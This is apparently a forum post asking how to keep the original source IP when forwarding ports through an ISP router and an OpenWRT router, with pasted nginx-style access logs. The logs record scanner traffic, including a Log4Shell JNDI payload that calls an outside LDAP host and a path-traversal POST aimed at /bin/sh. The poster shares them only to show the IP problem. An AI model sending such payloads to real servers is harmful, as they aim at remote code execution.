Hi,
I have a similar problem of Need original source IP on forwarded traffic but I didn't found a solution in the topic.
My network config :
- ISP Router : Mode router 192.168.1.254 set to forward port to my OpenWRT
- Open WRT : 192.168.1.1 set to forward port to my server
- Server : 192.168.1.23 receive connexion
When my router was my default gateway, i just need to make a port forward from my ISP router to my server and the source ip is keeped
When the OpenWRT is the default gateway, previous rules doesn't work anymore...
So I set the two forwarding rules, so it worked but I lost ip source.
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "-"
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "PRI * HTTP/2.0" 400 154 "-" "-"
124.223.101.87 - - [06/Mar/2022:10:43:50 +0000] "GET / HTTP/1.1" 444 0 "-" "/${jndi:ldap://185.203.118.200:1389/Exploit}"
62.233.50.179 - - [06/Mar/2022:10:46:12 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 154 "-" "-"
45.146.165.37 - - [06/Mar/2022:11:09:32 +0000] "GET /console/ HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.218.143 - - [06/Mar/2022:11:39:10 +0000] "GET /actuator/health HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
45.146.165.37 - - [06/Mar/2022:12:23:31 +0000] "GET /_ignition/execute-solution HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.209.162 - - [06/Mar/2022:13:08:23 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.146.165.37 - - [06/Mar/2022:13:25:03 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.82.124.140 - - [06/Mar/2022:13:49:35 +0000] "GET / HTTP/1.1" 444 0 "-" "-"
13.82.124.140 - - [06/Mar/2022:13:49:35 +0000] "GET / HTTP/1.1" 444 0 "-" "-"
89.248.165.24 - - [06/Mar/2022:14:02:39 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 154 "-" "-"
45.146.165.37 - - [06/Mar/2022:14:55:03 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 154 "-" "-"
66.249.76.50 - - [06/Mar/2022:15:20:52 +0000] "GET /robots.txt HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.146.165.37 - - [06/Mar/2022:16:07:06 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.94.93.3 - - [06/Mar/2022:16:15:48 +0000] "GET /admin/config.php HTTP/1.1" 400 252 "-" "gbrmss/7.29.0"
176.58.109.214 - - [06/Mar/2022:16:30:44 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
207.46.13.95 - - [06/Mar/2022:16:51:13 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
172.105.89.161 - - [06/Mar/2022:16:51:49 +0000] "GET /0bef HTTP/1.0" 400 252 "-" "-"
40.77.167.65 - - [06/Mar/2022:17:08:34 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.241.218.78 - - [06/Mar/2022:17:19:35 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
192.168.1.1 - - [07/Mar/2022:11:03:33 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:33 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:37 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:38 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:55:55 +0000] "+\xF0\xBB\xD2\x19\xFD\x11\xDE\x0B\x87\x04\x81\xFDz\xF6s\xEFl\xE9e" 400 154 "-" "-"
192.168.1.1 - - [07/Mar/2022:11:57:23 +0000] "GET / HTTP/1.1" 500 174 "-" "libwww-perl/6.61"
192.168.1.1 - - [07/Mar/2022:12:24:26 +0000] "GET / HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.168.1.1 - - [07/Mar/2022:12:51:14 +0000] "GET / HTTP/1.0" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:52 +0000] "GET / HTTP/1.0" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:53 +0000] "GET /text4041646657511 HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:53 +0000] "POST /sdk HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:54 +0000] "GET / HTTP/1.1" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:55 +0000] "GET /evox/about HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:55 +0000] "GET /HNAP1 HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:52:19 +0000] "GET / HTTP/1.1" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:52:21 +0000] "GET /favicon.ico HTTP/1.1" 500 174 "-" "curl/7.75.0"
Is the good thing to make 2 port forward ?
Can allow traffic between wan and my server directly ?
How can I keep the source IP ?
Thanks for help
